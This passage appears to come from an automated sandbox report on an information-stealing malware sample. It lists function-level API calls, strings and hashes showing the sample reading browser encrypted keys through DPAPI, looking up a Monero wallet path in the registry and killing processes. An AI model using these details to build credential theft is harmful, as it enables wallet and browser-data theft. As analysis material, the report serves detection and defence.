Opcode Fuzzy Hash: 0f488bded4a2284775a0cad491dd4ea20a2d1d9719508126ea45b82ab1ed90ec
Instruction Fuzzy Hash: 6301A171D0AB2DABDB33ABA9940577DB7A0AF44710F050115FE1063280CB34AA41DFD6

Function 00409E40 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
memset.MSVCRT ref: 00409ECF
LocalAlloc.KERNEL32(00000040), ref: 00409F07

Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E

lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012

Strings

@, xrefs: 00409EE8
v10, xrefs: 00409E9C
v20, xrefs: 00409E5E

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpymemcmp$AllocLocalmemset
String ID: @$v10$v20
API String ID: 3420379846-278772428
Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8

Function 009EC642 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592

lstrcpy.KERNEL32(00000000,?), ref: 009EC736
lstrcpy.KERNEL32(00000000,?), ref: 009EC75F
ShellExecuteEx.SHELL32(0000003C), ref: 009EC7CB

Strings

(QC, xrefs: 009EC6B0
<, xrefs: 009EC77F
"" , xrefs: 009EC68C
(QC, xrefs: 009EC6F0

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: "" $(QC$(QC$<
API String ID: 3031569214-2404812987
Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction ID: 31394d731eb2722f2a044748e4f2206706e6ed4c05526bd8ba3ba89dfc1158d0
Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction Fuzzy Hash: C4514F71D042998FCB10EFB9D881AACBBB1AF88314F25487AE545EB712DB749D46CF40

Function 009F2947 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 009F2982
GetVolumeInformationA.KERNEL32(?,00000000,00000000,009E967D,00000000,00000000,00000000,00000000), ref: 009F29B3
GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F2A16
RtlAllocateHeap.NTDLL(00000000), ref: 009F2A1D
wsprintfA.USER32 ref: 009F2A42

Strings

:\, xrefs: 009F299C
C, xrefs: 009F298C

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 2572753744-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: f23003a35257220081c7d1150b03730d7d0037c293448a06bb96ea69fa655a75
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: 093181B1D082499FCB14CFA88A85AEEFFBDEB58740F00416DE505E7650E2748B008BB1

Function 00401000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
HeapAlloc.KERNEL32(00000000), ref: 0040101C
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
RegCloseKey.ADVAPI32(?), ref: 0040105D

Strings

SOFTWARE\monero-project\monero-core, xrefs: 0040102F
wallet_path, xrefs: 0040104D

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0

Function 00424760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
Process32First.KERNEL32(00000000,00000128), ref: 00424789
Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
CloseHandle.KERNEL32(00000000), ref: 004247D2
Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
CloseHandle.KERNEL32(00000000), ref: 004247EB

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4

Function 009F49C7 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 009F49E0
Process32First.KERNEL32(00000000,00000128), ref: 009F49F0
Process32Next.KERNEL32(00000000,00000128), ref: 009F4A02
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009F4A23
TerminateProcess.KERNEL32(00000000,00000000), ref: 009F4A32
CloseHandle.KERNEL32(00000000), ref: 009F4A39
Process32Next.KERNEL32(00000000,00000128), ref: 009F4A47
CloseHandle.KERNEL32(00000000), ref: 009F4A52

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 2af0d5cc91a786b46c1f9a01411f84cfb58680b6325d2b661db5999e6092fa54
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 22019271A81218AFE7215B609C89FFB777DEB48751F001188FA0992191EFB0CD808FA4

Function 00407130 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040717E
GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
HeapAlloc.KERNEL32(00000000), ref: 004071C0
memcpy.MSVCRT(00000000,?), ref: 004071ED
GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
HeapFree.KERNEL32(00000000), ref: 0040720A
GetProcAddress.KERNEL32(00000000,?), ref: 00407269

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
String ID:
API String ID: 1745114167-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65

Function 009D7397 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 009D73E5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 009D7420
RtlAllocateHeap.NTDLL(00000000), ref: 009D7427
memcpy.MSVCRT(00000000,?), ref: 009D7454
GetProcessHeap.KERNEL32(00000000,?), ref: 009D746A
HeapFree.KERNEL32(00000000), ref: 009D7471
GetProcAddress.KERNEL32(00000000,?), ref: 009D74D0

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
String ID:
API String ID: 413393563-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: a8ef38b6b6d677e7ba5fd24704c3ad127a5d270b0ca2775cb6816545d6e0fdfe
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: 2F416E717446059BDB20CFA9EC847AAF7E9EB85305F14856AEC4DC7350E775EC108BA0

Function 00409CD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00409D08
LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C

Strings

, xrefs: 00409DC5
DPAPI, xrefs: 00409D96
"encrypted_key":", xrefs: 00409D5D

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 4154055062-738592651
Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98

Function 00417F60 Relevance: 10.6, APIs: 7, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00417F84
lstrlenA.KERNEL32(00000000), ref: 00417FB1
lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
strtok_s.MSVCRT ref: 00417FF1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95

Function 009F4787 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009F47A1
GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,009E558F), ref: 009F47CC
RtlAllocateHeap.NTDLL(00000000), ref: 009F47D3
wsprintfW.USER32 ref: 009F47E2
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009F4851
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009F4860
CloseHandle.KERNEL32(00000000,?,?), ref: 009F4867

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
Instruction ID: 2484b543db148752e453d3cf578facd951b24089800f91eae9841beeb2ce7a63
Opcode Fuzzy Hash: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
Instruction Fuzzy Hash: D9316D71A00209BBEB20DFE4DC89FEEB77DAF45741F104059FA05E7180DBB4AA418BA5

Function 00417DC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417DD8

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
std::_Xinvalid_argument.LIBCPMT ref: 00417E11
memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

invalid string position, xrefs: 00417DD3
string too long, xrefs: 00417DF1, 00417E0C

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
String ID: invalid string position$string too long
API String ID: 702443124-4289949731
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9

Function 00408880 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004088B3

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

x@, xrefs: 004088EC, 004088EF
yxxx, xrefs: 0040890A
vector<T> too long, xrefs: 004088AE
yxxx, xrefs: 004088BD
x@, xrefs: 00408954

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
